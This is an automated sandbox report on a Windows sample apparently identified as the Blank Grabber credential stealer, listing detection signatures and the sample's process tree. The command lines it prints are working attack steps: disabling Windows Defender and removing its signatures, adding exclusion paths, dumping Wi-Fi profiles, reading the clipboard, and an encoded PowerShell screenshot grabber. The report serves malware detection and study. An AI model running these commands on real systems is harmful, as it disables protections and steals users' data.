Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mei.exe

Overview

General Information

Sample name:mei.exe
Analysis ID:1354458
MD5:b5479bf5c97cfa81c02676bb9335ab24
SHA1:e823a36420bdeccfd8e4c6ad9d14e863263caac7
SHA256:02c36b712aeaad34359c72311c8624062ea5dfc6311a15ed2b46b403470c3bc0
Tags:exe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
DLL side loading technique detected
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Modifies Windows Defender protection settings
Potential dropper URLs found in powershell memory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Too many similar processes found
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • mei.exe (PID: 7468 cmdline: C:\Users\user\Desktop\mei.exe MD5: B5479BF5C97CFA81C02676BB9335AB24)
    • mei.exe (PID: 7484 cmdline: C:\Users\user\Desktop\mei.exe MD5: B5479BF5C97CFA81C02676BB9335AB24)
      • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7636 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7676 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 8420 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7760 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7840 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8068 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8152 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7256 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2724 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5996 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7772 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8100 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7292 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8048 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5796 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5804 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8112 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7388 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7804 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2200 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 8028 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 2500 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8228 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8448 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8396 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8592 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8404 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8632 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8700 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8764 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8788 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8848 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8864 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8924 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8948 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9008 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
